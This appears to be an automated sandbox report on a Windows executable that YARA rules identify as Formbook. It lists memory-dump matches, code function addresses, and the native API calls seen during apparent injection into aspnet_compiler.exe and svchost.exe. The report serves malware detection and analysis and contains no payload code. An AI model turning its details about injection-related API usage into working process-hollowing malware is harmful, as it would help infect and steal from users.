Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: fooYgfbxno.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
Yara signature match
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\fooYgfbxno.exe Code function: 1_2_008258D3 1_2_008258D3
Source: C:\Users\user\Desktop\fooYgfbxno.exe Code function: 1_2_00F95AB0 1_2_00F95AB0
Source: C:\Users\user\Desktop\fooYgfbxno.exe Code function: 1_2_00F924D1 1_2_00F924D1
Source: C:\Users\user\Desktop\fooYgfbxno.exe Code function: 1_2_00F90678 1_2_00F90678
Source: C:\Users\user\Desktop\fooYgfbxno.exe Code function: 1_2_00F91CE8 1_2_00F91CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041C950 2_2_0041C950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00408C6B 2_2_00408C6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00408C70 2_2_00408C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041BE42 2_2_0041BE42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041C66C 2_2_0041C66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041CFB5 2_2_0041CFB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151F900 2_2_0151F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D1002 2_2_015D1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A830 2_2_0153A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015EE824 2_2_015EE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E28EC 2_2_015E28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152B090 2_2_0152B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E20A8 2_2_015E20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153AB40 2_2_0153AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015BCB4F 2_2_015BCB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E2B28 2_2_015E2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D03DA 2_2_015D03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154ABD8 2_2_0154ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DDBD2 2_2_015DDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153EB9A 2_2_0153EB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154EBB0 2_2_0154EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CFA2B 2_2_015CFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E22AE 2_2_015E22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E1D55 2_2_015E1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E2D07 2_2_015E2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01510D20 2_2_01510D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E25DD 2_2_015E25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152D5E0 2_2_0152D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542581 2_2_01542581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DD466 2_2_015DD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152841F 2_2_0152841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4496 2_2_015D4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015EDFCE 2_2_015EDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E1FF1 2_2_015E1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DD616 2_2_015DD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01536E30 2_2_01536E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E2EF7 2_2_015E2EF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394EB9A 12_2_0394EB9A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395138B 12_2_0395138B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395EBB0 12_2_0395EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E03DA 12_2_039E03DA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039EDBD2 12_2_039EDBD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0395ABD8 12_2_0395ABD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039D23E3 12_2_039D23E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A309 12_2_0394A309
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F2B28 12_2_039F2B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039CCB4F 12_2_039CCB4F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394AB40 12_2_0394AB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F22AE 12_2_039F22AE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4AEF 12_2_039E4AEF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B236 12_2_0394B236
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039DFA2B 12_2_039DFA2B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039499BF 12_2_039499BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0392F900 12_2_0392F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03944120 12_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393B090 12_2_0393B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039520A0 12_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F20A8 12_2_039F20A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F28EC 12_2_039F28EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E1002 12_2_039E1002
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394A830 12_2_0394A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039FE824 12_2_039FE824
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039FDFCE 12_2_039FDFCE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F1FF1 12_2_039F1FF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039D1EB6 12_2_039D1EB6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F2EF7 12_2_039F2EF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039ED616 12_2_039ED616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03945600 12_2_03945600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03946E30 12_2_03946E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03952581 12_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E2D82 12_2_039E2D82
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F25DD 12_2_039F25DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393D5E0 12_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F2D07 12_2_039F2D07
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03920D20 12_2_03920D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039F1D55 12_2_039F1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039E4496 12_2_039E4496
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0393841F 12_2_0393841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0394B477 12_2_0394B477
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039ED466 12_2_039ED466
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7C950 12_2_00C7C950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C68C6B 12_2_00C68C6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C68C70 12_2_00C68C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C62D90 12_2_00C62D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7BE42 12_2_00C7BE42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7C66C 12_2_00C7C66C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7CFB5 12_2_00C7CFB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C62FB0 12_2_00C62FB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 0151B150 appears 139 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B150 appears 145 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004185D0 NtCreateFile, 2_2_004185D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418680 NtReadFile, 2_2_00418680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418700 NtClose, 2_2_00418700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004187B0 NtAllocateVirtualMemory, 2_2_004187B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004185CA NtCreateFile, 2_2_004185CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041867A NtReadFile, 2_2_0041867A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004186CB NtReadFile, 2_2_004186CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004187AA NtAllocateVirtualMemory, 2_2_004187AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01559910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015599A0 NtCreateSection,LdrInitializeThunk, 2_2_015599A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559840 NtDelayExecution,LdrInitializeThunk, 2_2_01559840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01559860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_015598F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A50 NtCreateFile,LdrInitializeThunk, 2_2_01559A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01559A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A20 NtResumeThread,LdrInitializeThunk, 2_2_01559A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559540 NtReadFile,LdrInitializeThunk, 2_2_01559540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015595D0 NtClose,LdrInitializeThunk, 2_2_015595D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01559710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01559FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01559780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_015597A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01559660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_015596E0
